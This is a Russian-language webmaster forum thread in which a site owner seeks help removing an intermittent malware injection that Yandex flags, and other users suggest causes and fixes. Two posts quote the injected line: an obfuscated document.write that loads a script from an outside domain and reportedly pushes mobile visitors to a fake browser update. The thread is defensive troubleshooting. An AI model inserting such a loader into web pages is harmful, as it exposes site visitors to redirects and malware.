Вирус на сайте-вердикт "Поведенческий анализ"

12 3
F
На сайте с 29.07.2013
Offline
1
2940

Уже больше двух месяцев не могу найти эту заразу на сайте fotoinform.net . На страницах нет а Яндекс все ругается. Поддержка Яши формально отписывается. На сайте нет никаких партнерских агрегатов. Перелопатили все файлы ни чего не нашли. Кто может помочь удалить вредоносный код ?

с помощью онлайн сервиса поймали вот такое сообщение-

Suspicious domain detected.

Details: http://sucuri.net/malware/malware-entry-mwblacklisted35

//--></script><script>document.write("<sc"+"ript src='http://mnokih.ru/query.js' ></scr"+"ipt>");</script>

draff
На сайте с 30.03.2010
Offline
65
#1

Наверно прописано условие вывода этого скрипта для определенной группы, региона посетителей.

Сайт смотрел на главной,скрипт не нашел.

Удалю вирус с сайта Джумла! (http://joomlaforum.ru/index.php/topic,254903.0.html)
F
На сайте с 29.07.2013
Offline
1
#2

Говорят что он на мобилках переправляет на обновление браузера - типа на андроиде точно ее действие видели.

И главное что код появляется а потом сам и исчезает!

draff:
Наверно прописано условие вывода этого скрипта для определенной группы, региона посетителей.
Сайт смотрел на главной,скрипт не нашел.
draff
На сайте с 30.03.2010
Offline
65
#3

В .htacess чисто? Я смотрел с под агента Iphone. Если исчезает,то можно попробовать отключить curl_exec . Одному клиенту помогло.

Землякам могу помочь за обратную ссылку.

F
На сайте с 29.07.2013
Offline
1
#4

Чисто

К сожалению для понятие отключить curl_exec , что на Луне :(((

За обратную ссілку , єто как понять ?

draff:
В .htacess чисто? Я смотрел с под агента Iphone. Если исчезает,то можно попробовать отключить curl_exec . Одному клиенту помогло.
Землякам могу помочь за обратную ссылку.
K5
На сайте с 21.07.2010
Offline
209
#5

редиректов не видно, но один скрипт в шаблоне прописан не правильно

/layouts/js/plagins/json.js -> /layouts/js/plugins/json.js

или специально его "отключили"?

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
F
На сайте с 29.07.2013
Offline
1
#6
kgtu5:
редиректов не видно, но один скрипт в шаблоне прописан не правильно
/layouts/js/plagins/json.js -> /layouts/js/plugins/json.js
или специально его "отключили"?

нужно уже спросить у разработчиков, а как его исправить ?

draff
На сайте с 30.03.2010
Offline
65
#7
fotka:

К сожалению для понятие отключить curl_exec , что на Луне :(((
За обратную ссілку , єто как понять ?

php.ini

;extension = curl.so

Но желательно связаться с хостером,чтобы узнать как действует директивы php.ini на каталог с файлами сайта.

Обычная ссылка на мой сайт.

F
На сайте с 29.07.2013
Offline
1
#8

Свяжусь конечно, но php.ini нет такого файла проекте

draff:
php.ini
;extension = curl.so

Но желательно связаться с хостером,чтобы узнать как действует директивы php.ini на каталог с файлами сайта.
Обычная ссылка на мой сайт.
TF-Studio
На сайте с 17.08.2010
Offline
334
#9

Есть этот код у вас.

и ведет на вирусный сайт.

<!-- slider start -->
<script type="text/javascript" src="http://fotoinform.net/layouts/js/jquery-1.8.3.js"></script><script>document.write("<sc"+"ript src='http://mnokih.ru/query.js' ></scr"+"ipt>");</script>
Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).
F
На сайте с 29.07.2013
Offline
1
#10

И где же он ?

TF-Studio:
Есть этот код у вас.
и ведет на вирусный сайт.
12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий